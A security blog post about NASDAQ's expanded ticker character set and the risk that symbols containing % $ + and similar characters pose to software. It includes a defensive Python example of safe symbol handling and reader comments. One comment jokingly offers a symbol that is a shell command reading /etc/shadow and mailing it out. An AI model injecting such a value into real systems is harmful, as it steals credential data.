web application security lab

NASDAQ Symbology Change

In talking with one of my clients the topic of special characters came up and one of the things they mentioned being worried about was symbology changes at NASDAQ. For those of you who don’t follow this kind of stuff, the old ticker symbols constituted a fairly small subset of possible combinations. The symbology change was designed to allow greater flexibility in the future of the naming conventions (think about it being like the difference between IPv4 and IPv6 in the stock market). Click here to read more details.

That would probably be all fine and dandy except some of the characters actually mean things in programming languages. For instance, % * # $ ~ + ! @ are included in the list of possible legal characters. How many lines of code do you think need to be reviewed and fixed before this actually will work seamlessly? My guess is many millions. How many new exploits do you think this will open? Hard to say, but it should be interesting to watch.
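To make the concern concrete, here is an added example (not code from the original post) that runs symbols containing the listed characters through three common handling patterns, each beside a form that treats the symbol as plain data. The function names, the `quotes` table and the sample data are assumptions made for illustration; `%ABC` and `$VAR` are the symbols mentioned in the comments below.

```python
import re
import sqlite3

def report_naive(symbol, price):
    # Symbol concatenated into the template: a '%' in it is parsed as a directive.
    return ("Last trade " + symbol + ": %.2f") % price

def report_safe(symbol, price):
    # Constant template; the symbol is passed as data.
    return "Last trade %s: %.2f" % (symbol, price)

def mentions_naive(symbol, text):
    # Symbol used as the pattern: '+', '*' and '$' act as regex operators.
    return re.findall(symbol, text)

def mentions_safe(symbol, text):
    # re.escape makes every character of the symbol match literally.
    return re.findall(re.escape(symbol), text)

def make_db(symbols):
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE quotes (symbol TEXT PRIMARY KEY)")
    db.executemany("INSERT INTO quotes VALUES (?)", [(s,) for s in symbols])
    return db

def lookup_naive(db, symbol):
    # The parameter is bound, but LIKE still reads '%' in the value as a wildcard.
    sql = "SELECT symbol FROM quotes WHERE symbol LIKE ? ORDER BY symbol"
    return [row[0] for row in db.execute(sql, (symbol,))]

def lookup_safe(db, symbol):
    # Equality compares the stored symbol with the whole value, no wildcards.
    sql = "SELECT symbol FROM quotes WHERE symbol = ? ORDER BY symbol"
    return [row[0] for row in db.execute(sql, (symbol,))]

if __name__ == "__main__":
    # Constructed sample data, not real listings.
    db = make_db(["ABC", "XABC", "%ABC", "AB+"])
    news = "AB rose, ABB fell, AB+ and $VAR flat"
    print(mentions_naive("AB+", news), mentions_safe("AB+", news))
    print(mentions_naive("$VAR", news), mentions_safe("$VAR", news))
    print(lookup_naive(db, "%ABC"), lookup_safe(db, "%ABC"))
    print(report_safe("%ABC", 10.5))
    try:
        report_naive("%ABC", 10.5)
    except ValueError as exc:
        print("naive report failed:", exc)
```

None of the naive functions builds code from the symbol, yet each one hands it to a mini-language (format directives, regex, LIKE patterns) where these characters are operators.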

8 Responses to “NASDAQ Symbology Change”

  1. h3xstream Says:

    Paranoia? .. It’s not the first time that the ASCII set is used in history.
    What’s new?

  2. i breaky your legs Says:

    Well, this would be a great adventure place for script kiddies ;-)

  3. Fred Says:

    The changes at NASDAQ? Easy. The changes in the millions of applications that use NASDAQ data? Millions may be a low estimate.

    The exploit I’m looking forward to is this:
    Starting a company, going public, and then using the symbol $VAR.

  4. Dan Weber Says:

    Will someone actually be able to resist making their stock symbol $$$$ ?

    Well, I guess I would. Because my new company’s stock symbol is `cat /etc/shadow | mail danweber@me`.

  5. Ronald van den Heetkamp Says:

    For a long time I have had trouble with our limited character set (Latin-western). There isn’t a lot possible. If you look at Arabic or any other symbol language, you’ll notice that it’s far richer than ours. As far, that I also questioned the use of single and double quotes in programming languages. Mixing regular “text” literals with “code” really leads to many problems IMO.

    So we never had a clever separation of the two, due to limitation.

  6. RSnake Says:

    @h3xstream - clearly it’s not paranoia if it’s been used to attack systems in the past and the people working on it are actively worried about it. I like to call it reality. The part that was new was the symbology change, if that wasn’t clear.

    @Dan - I think it’s limited to 6 chars, and I’m not sure any kind of quotes are allowed. Keep thinking! ;)

  7. Tom Says:

    I understand certain parsing code, etc might need to be changed, but why does it matter that some of these symbols are used in certain programming languages? Strings are strings, and unless people are doing things like

    str = "%ABC";

    which they shouldn’t be, or hard coded variable names like “int %ABC” or something, I don’t see how that would matter?

    What languages are we talking about?

  8. Ronald van den Heetkamp Says:


    I was chatting about things like PHP for instance. Where strictly strings, or quotes are basically useless anyway. Since, PHP treats everything as string. So you see this:

    $b = 1;

    could be as this:

    $a = abcdefg;

    Why not? Since the integer/dec. is parsed as string also in PHP, why not drop the quotes, it can be done and it should work. I get what the argument will be: PHP reads everything on 1 single line and parses it, yeah true but a space {string} semicolon should be enough. Let alone the other signs.

    That’s why I favour JavaScript so much for its generally simple syntax, or even ASP where the ‘ single quote is used for commenting.